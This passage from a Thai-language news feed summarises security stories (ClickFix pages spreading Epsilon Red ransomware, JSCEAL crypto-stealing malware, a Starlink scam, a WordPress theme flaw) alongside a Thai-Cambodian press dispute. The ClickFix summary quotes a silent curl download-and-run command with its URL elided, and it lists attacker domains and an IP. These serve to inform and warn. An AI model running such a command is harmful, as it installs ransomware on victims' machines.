⛔ แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด ⛔ อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก ‼️ ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน ⛔ เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins ⛔ ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด ‼️ การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก ⛔ ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่ ⛔ ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected
    0 Comments 0 Shares 129 Views 0 Reviews
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 Comments 0 Shares 104 Views 0 Reviews
  • เบรกสัมพันธ์สื่อกัมพูชา ส่อรับใช้ 'ฮุน มาเน็ต'

    3 องค์กรวิชาชืพสื่อ ได้แก่ สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทย (TJA) สมาคมผู้ผลิตข่าวออนไลน์ (SONP) และสหภาพแรงงานกลางสื่อมวลชนไทย (NUJT) ออกแถลงการณ์เรียกร้องสมาคมนักข่าวกัมพูชา (Club of Cambodian Journalists หรือ CCJ) ตรวจสอบการทำหน้าที่ของสื่อมวลชนในประเทศอย่างจริงจัง เพื่อจัดการปัญหาข่าวปลอมและข่าวบิดเบือน โดยมีข้อเรียกร้อง 3 ข้อ ได้แก่

    1. หยุดแทรกแซงกิจการภายในของสื่อมวลชนไทย ให้ตรวจสอบจริยธรรมสื่อกัมพูชาอย่างเข้มแข็ง ปราศจากการครอบงำ

    2. ให้ CCJ มุ่งมั่นจัดการปัญหาข่าวปลอมและข้อมูลบิดเบือน ที่มีต้นทางแพร่กระจายในโลกออนไลน์จากกัมพูชาอย่างเป็นรูปธรรม เนื่องจากตรวจพบข้อมูลบิดเบือนจำนวนมาก

    3. ยืนยันว่าสื่อมวลชนไทยมีระบบกำกับดูแลกันเองด้านจริยธรรม ยึดมั่นและเคารพในสิทธิเสรีภาพ ยืนยันเจตนารมณ์รายงานข่าวตามหลักจริยธรรม เป็นกลาง ครบถ้วนรอบด้าน ไม่ยุยงให้เกลียดชัง ต้องการให้เกิดสันติภาพแท้จริงและยั่งยืน

    ในตอนท้ายระบุว่า เนื่องจากการออกแถลงการณ์ของ CCJ หมิ่นเหม่ต่อการเป็นกระบอกเสียงของรัฐบาลกัมพูชา (นายฮุน มาเน็ต) มากกว่าการทำหน้าที่สื่อ ดังนั้นสมาคมนักข่าวฯ ซึ่งมีบันทึกความเข้าใจ (MOU) ร่วมกัน จึงจำเป็นต้องระงับความสัมพันธ์กับ CCJ ชั่วคราว จนกว่าสถานการณ์จะกลับสู่ภาวะปกติ

    ก่อนหน้านี้ CCJ ออกแถลงการณ์ทำทีเรียกร้องให้สื่อมวลชนไทย ปฎิบัติตามมาตรฐานวิชาชีพอย่างเคร่งครัด ตรวจสอบแหล่งข้อมูลรอบคอบและรายงานอย่างมีความรับผิดชอบ พร้อมทั้งขอให้มีบทบาทลดความตึงเครียด ด้วยการนำเสนอข่าวที่ไม่ยุยงปลุกปั่นชาตินิยมหรือเชื้อชาติ หันมาเน้นส่งเสริมบทสนทนาและความร่วมมือในทางที่สร้างสรรค์ระหว่างสองประเทศ โดยกล่าวหาว่าสื่อมวลชนไทย 2 สำนักเผยแพร่ข้อมูลเท็จ ระบุชื่อข่าวสด สื่อในเครือมติชน และ The Nation Thailand สื่อออนไลน์ภาษาอังกฤษของเนชั่นกรุ๊ป

    แถลงการณ์นี้มีนัยยะโจมตีและดิสเครดิตสื่อมวลชนที่มีผู้ติดตามเป็นอันดับต้นของประเทศ โดยเฉพาะสื่อภาคภาษาอังกฤษที่เปรียบเสมือนหน้าต่างของโลก ขณะที่ผ่านมาสื่อออนไลน์ไทยโดยเฉพาะเว็บไซต์ The Nation Thailand และ Bangkok Post ถูกโจมตีทางไซเบอร์มากกว่า 250 ล้านครั้ง

    อีกด้านหนึ่ง แถลงการณ์โต้กลับของ 3 สมาคมสื่อไทยระบุว่าที่ผ่านมาสื่อกัมพูชาเผยแพร่ข้อมูลบิดเบือนจำนวนมาก อาทิ อ้างว่าเครื่องบิน F-16 ของไทยทิ้งสารเคมีลงในกัมพูชา, กล่าวหาว่าไทยใช้เครื่องบิน F-16 ทิ้งระเบิด MK ซึ่งมีอำนาจทำลายล้างสูงใส่บ้านเรือนประชาชนชาวกัมพูชา, ปล่อยข่าวว่า พล.ท.บุญสิน พาดกลาง แม่ทัพภาคที่ 2 เสียชีวิต เป็นต้น

    #Newskit
    เบรกสัมพันธ์สื่อกัมพูชา ส่อรับใช้ 'ฮุน มาเน็ต' 3 องค์กรวิชาชืพสื่อ ได้แก่ สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทย (TJA) สมาคมผู้ผลิตข่าวออนไลน์ (SONP) และสหภาพแรงงานกลางสื่อมวลชนไทย (NUJT) ออกแถลงการณ์เรียกร้องสมาคมนักข่าวกัมพูชา (Club of Cambodian Journalists หรือ CCJ) ตรวจสอบการทำหน้าที่ของสื่อมวลชนในประเทศอย่างจริงจัง เพื่อจัดการปัญหาข่าวปลอมและข่าวบิดเบือน โดยมีข้อเรียกร้อง 3 ข้อ ได้แก่ 1. หยุดแทรกแซงกิจการภายในของสื่อมวลชนไทย ให้ตรวจสอบจริยธรรมสื่อกัมพูชาอย่างเข้มแข็ง ปราศจากการครอบงำ 2. ให้ CCJ มุ่งมั่นจัดการปัญหาข่าวปลอมและข้อมูลบิดเบือน ที่มีต้นทางแพร่กระจายในโลกออนไลน์จากกัมพูชาอย่างเป็นรูปธรรม เนื่องจากตรวจพบข้อมูลบิดเบือนจำนวนมาก 3. ยืนยันว่าสื่อมวลชนไทยมีระบบกำกับดูแลกันเองด้านจริยธรรม ยึดมั่นและเคารพในสิทธิเสรีภาพ ยืนยันเจตนารมณ์รายงานข่าวตามหลักจริยธรรม เป็นกลาง ครบถ้วนรอบด้าน ไม่ยุยงให้เกลียดชัง ต้องการให้เกิดสันติภาพแท้จริงและยั่งยืน ในตอนท้ายระบุว่า เนื่องจากการออกแถลงการณ์ของ CCJ หมิ่นเหม่ต่อการเป็นกระบอกเสียงของรัฐบาลกัมพูชา (นายฮุน มาเน็ต) มากกว่าการทำหน้าที่สื่อ ดังนั้นสมาคมนักข่าวฯ ซึ่งมีบันทึกความเข้าใจ (MOU) ร่วมกัน จึงจำเป็นต้องระงับความสัมพันธ์กับ CCJ ชั่วคราว จนกว่าสถานการณ์จะกลับสู่ภาวะปกติ ก่อนหน้านี้ CCJ ออกแถลงการณ์ทำทีเรียกร้องให้สื่อมวลชนไทย ปฎิบัติตามมาตรฐานวิชาชีพอย่างเคร่งครัด ตรวจสอบแหล่งข้อมูลรอบคอบและรายงานอย่างมีความรับผิดชอบ พร้อมทั้งขอให้มีบทบาทลดความตึงเครียด ด้วยการนำเสนอข่าวที่ไม่ยุยงปลุกปั่นชาตินิยมหรือเชื้อชาติ หันมาเน้นส่งเสริมบทสนทนาและความร่วมมือในทางที่สร้างสรรค์ระหว่างสองประเทศ โดยกล่าวหาว่าสื่อมวลชนไทย 2 สำนักเผยแพร่ข้อมูลเท็จ ระบุชื่อข่าวสด สื่อในเครือมติชน และ The Nation Thailand สื่อออนไลน์ภาษาอังกฤษของเนชั่นกรุ๊ป แถลงการณ์นี้มีนัยยะโจมตีและดิสเครดิตสื่อมวลชนที่มีผู้ติดตามเป็นอันดับต้นของประเทศ โดยเฉพาะสื่อภาคภาษาอังกฤษที่เปรียบเสมือนหน้าต่างของโลก ขณะที่ผ่านมาสื่อออนไลน์ไทยโดยเฉพาะเว็บไซต์ The Nation Thailand และ Bangkok Post ถูกโจมตีทางไซเบอร์มากกว่า 250 ล้านครั้ง อีกด้านหนึ่ง แถลงการณ์โต้กลับของ 3 สมาคมสื่อไทยระบุว่าที่ผ่านมาสื่อกัมพูชาเผยแพร่ข้อมูลบิดเบือนจำนวนมาก อาทิ อ้างว่าเครื่องบิน F-16 ของไทยทิ้งสารเคมีลงในกัมพูชา, กล่าวหาว่าไทยใช้เครื่องบิน F-16 ทิ้งระเบิด MK ซึ่งมีอำนาจทำลายล้างสูงใส่บ้านเรือนประชาชนชาวกัมพูชา, ปล่อยข่าวว่า พล.ท.บุญสิน พาดกลาง แม่ทัพภาคที่ 2 เสียชีวิต เป็นต้น #Newskit
    0 Comments 0 Shares 167 Views 0 Reviews
  • สมาคมนักข่าวฯ สมาคมผู้ผลิตข่าวออนไลน์ และสหภาพแรงงานกลางสื่อมวลชนไทย รวมพลังแถลงการณ์ร่วม ตอบโต้สมาคมนักข่าวกัมพูชาอย่างดุเดือด หลังถูกกล่าวหาว่าสื่อไทยขาดจริยธรรมในการรายงานข่าวชายแดน ชี้เป็นการดูหมิ่นที่ยอมรับไม่ได้ พร้อมเรียกร้องให้ CCJ ตรวจสอบข่าวปลอม-ข้อมูลบิดเบือนภายในประเทศตนเองอย่างจริงจัง ก่อนประกาศระงับความร่วมมือในฐานะพันธมิตรสื่อ จนกว่าสถานการณ์จะคลี่คลาย

    อ่านต่อ..https://news1live.com/detail/9680000072588

    #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    สมาคมนักข่าวฯ สมาคมผู้ผลิตข่าวออนไลน์ และสหภาพแรงงานกลางสื่อมวลชนไทย รวมพลังแถลงการณ์ร่วม ตอบโต้สมาคมนักข่าวกัมพูชาอย่างดุเดือด หลังถูกกล่าวหาว่าสื่อไทยขาดจริยธรรมในการรายงานข่าวชายแดน ชี้เป็นการดูหมิ่นที่ยอมรับไม่ได้ พร้อมเรียกร้องให้ CCJ ตรวจสอบข่าวปลอม-ข้อมูลบิดเบือนภายในประเทศตนเองอย่างจริงจัง ก่อนประกาศระงับความร่วมมือในฐานะพันธมิตรสื่อ จนกว่าสถานการณ์จะคลี่คลาย อ่านต่อ..https://news1live.com/detail/9680000072588 #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 Comments 0 Shares 419 Views 0 Reviews
  • เรื่องเล่าจากโลกคริปโต: JSCEAL มัลแวร์ที่ซ่อนตัวในโฆษณาและ JavaScript

    นักวิจัยจาก Check Point พบแคมเปญมัลแวร์ขนาดใหญ่ที่เริ่มต้นตั้งแต่มีนาคม 2024 โดยใช้ชื่อว่า “JSCEAL” ซึ่งมีเป้าหมายคือผู้ใช้แอปซื้อขายคริปโตและกระเป๋าเงินดิจิทัล โดยแฮกเกอร์สร้างแอปปลอมและเว็บไซต์หลอกลวงที่ดูเหมือนของจริง แล้วโปรโมตผ่านโฆษณาบน Facebook และแพลตฟอร์มอื่น ๆ

    เมื่อเหยื่อคลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่ให้ดาวน์โหลดไฟล์ติดตั้ง MSI ซึ่งเมื่อเปิดใช้งาน จะเริ่มกระบวนการเก็บข้อมูลระบบผ่าน PowerShell และสคริปต์ JavaScript ที่ซ่อนอยู่ในเว็บไซต์ จากนั้นจะส่งข้อมูลไปยังเซิร์ฟเวอร์ของแฮกเกอร์ และหากพบว่าเครื่องมีข้อมูลสำคัญ ก็จะปล่อย payload สุดท้ายคือ JSCEAL ซึ่งทำงานผ่าน Node.js

    JSCEAL ใช้ไฟล์ JavaScript ที่ถูกคอมไพล์ด้วย V8 engine ของ Google ซึ่งทำให้โค้ดถูกซ่อนไว้อย่างแนบเนียนและหลบเลี่ยงการตรวจจับจากแอนติไวรัสได้อย่างมีประสิทธิภาพ

    JSCEAL เป็นมัลแวร์ที่ใช้ไฟล์ JavaScript แบบคอมไพล์เพื่อหลบเลี่ยงการตรวจจับ
    ใช้ฟีเจอร์ V8 JSC ของ Google เพื่อซ่อนโค้ด
    ทำให้แอนติไวรัสทั่วไปไม่สามารถวิเคราะห์ได้ก่อนการรันจริง

    แคมเปญนี้เริ่มตั้งแต่มีนาคม 2024 และยังคงแพร่กระจายอย่างต่อเนื่อง
    พบโฆษณาปลอมกว่า 35,000 รายการใน EU ภายในครึ่งแรกของปี 2025
    คาดว่ามีผู้ตกเป็นเหยื่อมากกว่า 10 ล้านคนทั่วโลก

    แฮกเกอร์ใช้โฆษณาบน Facebook เพื่อหลอกให้ติดตั้งแอปปลอม
    โฆษณาถูกโพสต์ผ่านบัญชีที่ถูกขโมยหรือสร้างใหม่
    เว็บไซต์ปลอมเลียนแบบบริการจริง เช่น TradingView

    ไฟล์ MSI ที่ดาวน์โหลดจะเปิดเว็บวิวไปยังเว็บไซต์จริงเพื่อหลอกเหยื่อ
    ใช้ msedge_proxy.exe เพื่อเปิดเว็บจริงควบคู่กับการติดตั้งมัลแวร์
    ทำให้เหยื่อไม่สงสัยว่ามีสิ่งผิดปกติเกิดขึ้น

    JSCEAL สามารถขโมยข้อมูลได้หลากหลายประเภท
    รหัสผ่าน, คุกกี้, seed phrase, ข้อมูล Telegram, ภาพหน้าจอ, keystroke
    สามารถดักจับเว็บทราฟฟิกและฝังสคริปต์ในเว็บไซต์ธนาคารหรือคริปโต

    มัลแวร์มีโครงสร้างแบบหลายชั้นและปรับเปลี่ยน payload ได้ตามสถานการณ์
    ใช้ fingerprinting scripts เพื่อประเมินความคุ้มค่าของเหยื่อก่อนปล่อย payload
    มีการตั้ง proxy ภายในเครื่องเพื่อดักข้อมูลแบบ real-time

    https://www.techradar.com/pro/security/major-new-malware-strain-targets-crypto-users-via-malicious-ads-heres-what-we-know-and-how-to-stay-safe
    🧠 เรื่องเล่าจากโลกคริปโต: JSCEAL มัลแวร์ที่ซ่อนตัวในโฆษณาและ JavaScript นักวิจัยจาก Check Point พบแคมเปญมัลแวร์ขนาดใหญ่ที่เริ่มต้นตั้งแต่มีนาคม 2024 โดยใช้ชื่อว่า “JSCEAL” ซึ่งมีเป้าหมายคือผู้ใช้แอปซื้อขายคริปโตและกระเป๋าเงินดิจิทัล โดยแฮกเกอร์สร้างแอปปลอมและเว็บไซต์หลอกลวงที่ดูเหมือนของจริง แล้วโปรโมตผ่านโฆษณาบน Facebook และแพลตฟอร์มอื่น ๆ เมื่อเหยื่อคลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่ให้ดาวน์โหลดไฟล์ติดตั้ง MSI ซึ่งเมื่อเปิดใช้งาน จะเริ่มกระบวนการเก็บข้อมูลระบบผ่าน PowerShell และสคริปต์ JavaScript ที่ซ่อนอยู่ในเว็บไซต์ จากนั้นจะส่งข้อมูลไปยังเซิร์ฟเวอร์ของแฮกเกอร์ และหากพบว่าเครื่องมีข้อมูลสำคัญ ก็จะปล่อย payload สุดท้ายคือ JSCEAL ซึ่งทำงานผ่าน Node.js JSCEAL ใช้ไฟล์ JavaScript ที่ถูกคอมไพล์ด้วย V8 engine ของ Google ซึ่งทำให้โค้ดถูกซ่อนไว้อย่างแนบเนียนและหลบเลี่ยงการตรวจจับจากแอนติไวรัสได้อย่างมีประสิทธิภาพ ✅ JSCEAL เป็นมัลแวร์ที่ใช้ไฟล์ JavaScript แบบคอมไพล์เพื่อหลบเลี่ยงการตรวจจับ ➡️ ใช้ฟีเจอร์ V8 JSC ของ Google เพื่อซ่อนโค้ด ➡️ ทำให้แอนติไวรัสทั่วไปไม่สามารถวิเคราะห์ได้ก่อนการรันจริง ✅ แคมเปญนี้เริ่มตั้งแต่มีนาคม 2024 และยังคงแพร่กระจายอย่างต่อเนื่อง ➡️ พบโฆษณาปลอมกว่า 35,000 รายการใน EU ภายในครึ่งแรกของปี 2025 ➡️ คาดว่ามีผู้ตกเป็นเหยื่อมากกว่า 10 ล้านคนทั่วโลก ✅ แฮกเกอร์ใช้โฆษณาบน Facebook เพื่อหลอกให้ติดตั้งแอปปลอม ➡️ โฆษณาถูกโพสต์ผ่านบัญชีที่ถูกขโมยหรือสร้างใหม่ ➡️ เว็บไซต์ปลอมเลียนแบบบริการจริง เช่น TradingView ✅ ไฟล์ MSI ที่ดาวน์โหลดจะเปิดเว็บวิวไปยังเว็บไซต์จริงเพื่อหลอกเหยื่อ ➡️ ใช้ msedge_proxy.exe เพื่อเปิดเว็บจริงควบคู่กับการติดตั้งมัลแวร์ ➡️ ทำให้เหยื่อไม่สงสัยว่ามีสิ่งผิดปกติเกิดขึ้น ✅ JSCEAL สามารถขโมยข้อมูลได้หลากหลายประเภท ➡️ รหัสผ่าน, คุกกี้, seed phrase, ข้อมูล Telegram, ภาพหน้าจอ, keystroke ➡️ สามารถดักจับเว็บทราฟฟิกและฝังสคริปต์ในเว็บไซต์ธนาคารหรือคริปโต ✅ มัลแวร์มีโครงสร้างแบบหลายชั้นและปรับเปลี่ยน payload ได้ตามสถานการณ์ ➡️ ใช้ fingerprinting scripts เพื่อประเมินความคุ้มค่าของเหยื่อก่อนปล่อย payload ➡️ มีการตั้ง proxy ภายในเครื่องเพื่อดักข้อมูลแบบ real-time https://www.techradar.com/pro/security/major-new-malware-strain-targets-crypto-users-via-malicious-ads-heres-what-we-know-and-how-to-stay-safe
    0 Comments 0 Shares 137 Views 0 Reviews
  • เรื่องเล่าจากอวกาศปลอม: เมื่อ Starlink ถูกแอบอ้างเพื่อหลอกเงินผู้บริโภค

    ช่วงกลางปี 2025 มีโฆษณาบน Facebook ที่อ้างว่าเสนอ “แพ็กเกจอินเทอร์เน็ต Starlink ตลอดชีพ” ในราคาเพียง $127 หรือแม้แต่ “แผนรายปี $67” พร้อมจานรับสัญญาณ Starlink Mini ฟรี ฟังดูคุ้มเกินจริงใช่ไหม? เพราะมันคือ “หลอกลวงเต็มรูปแบบ”2

    เมื่อผู้ใช้คลิกโฆษณา จะถูกนำไปยังเว็บไซต์ปลอมที่เลียนแบบหน้าตาและโลโก้ของ Starlink อย่างแนบเนียน เช่น “ministarnt.xyz” หรือ “starlinkoficial.com” ซึ่งใช้ภาพจริงและคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ

    เว็บไซต์เหล่านี้หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตและที่อยู่จัดส่ง โดยไม่มีการส่งสินค้าใด ๆ หรือส่งอุปกรณ์ปลอมที่ไม่สามารถเชื่อมต่อกับดาวเทียมได้เลย บางรายยังถูกขโมยข้อมูลและพบธุรกรรมแปลก ๆ ในบัญชีธนาคารภายหลัง

    SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้ และย้ำว่าโปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการเท่านั้น เช่น การแจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน

    มีการหลอกลวงผ่าน Facebook โดยอ้างว่าเป็นแพ็กเกจ Starlink ตลอดชีพ
    ราคาเพียง $127 หรือ $67 ต่อปี พร้อมจาน Starlink Mini ฟรี
    ดูเหมือนถูกมากเมื่อเทียบกับค่าบริการจริงที่ $120 ต่อเดือน

    เว็บไซต์ปลอมเลียนแบบหน้าตา Starlink อย่างแนบเนียน
    ใช้ชื่อโดเมนคล้ายของจริง เช่น “starlinkoficial.com”
    มีโลโก้ ภาพสินค้า และคำพูดจาก SpaceX เพื่อสร้างความน่าเชื่อถือ

    เมื่อผู้ใช้กรอกข้อมูล จะถูกขโมยเงินหรือข้อมูลส่วนตัว
    บางรายไม่ได้รับสินค้าเลย หรือได้อุปกรณ์ปลอมที่ใช้ไม่ได้
    พบธุรกรรมแปลก ๆ ในบัญชีหลังจากซื้อสินค้า

    SpaceX เคยออกคำเตือนเกี่ยวกับการหลอกลวงลักษณะนี้
    โปรโมชั่นจริงจะมีเฉพาะบนเว็บไซต์หรือบัญชีโซเชียลทางการ
    ตัวอย่างโปรจริง: แจกจานฟรีเมื่อสมัครใช้งาน 12 เดือน (มูลค่า $499)

    ผู้ใช้ทั่วโลกเริ่มร้องเรียนบนโซเชียลมีเดียตั้งแต่เดือนพฤษภาคม
    PCMag พบหลายรูปแบบของโฆษณาหลอกลวงเมื่อค้นคำว่า “Starlink” บน Facebook

    วิธีตรวจสอบว่าโปรโมชั่นจริงหรือไม่
